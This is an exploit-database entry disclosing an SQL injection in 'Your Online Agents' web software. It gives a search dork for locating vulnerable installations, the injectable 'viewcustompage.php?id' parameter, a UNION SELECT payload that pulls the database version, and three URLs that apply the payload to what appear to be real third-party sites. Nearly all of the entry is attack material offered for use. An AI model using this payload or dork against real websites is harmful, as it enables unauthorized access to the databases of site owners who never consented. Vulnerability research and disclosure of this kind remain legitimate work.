id: 20895
date: 06/15/2013
title: Your Online Agents Sql Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

Your Online Agents Sql Injection Vulnerability
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST 
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Dork           : "Powered by: YourOnlineAgents.com"
####################################################################
===[ Exploit ]===

Sql Injection:
==============

www.site.com/viewcustompage.php?id=[!inject!]

www.site.com/viewcustompage.php?id=null+union+distinctROW+select+1,version(),3,4,5,6,7,8,9,10,11

####################################################################

http://www.youronlineagents.com/kozaks/viewcustompage.php?id=null+union+distinctROW+select+1,version%28%29,3,4,5,6,7,8,9,10,11

http://www.maryandshannon.com/viewcustompage.php?id=null+union+distinctROW+select+1,version%28%29,3,4,5,6,7,8,9,10,11

http://www.bulath.com/viewcustompage.php?id=null+union+distinctROW+select+1,version%28%29,3,4,5,6,7,8,9,10,11

#  0day.today [2023-03-24]  #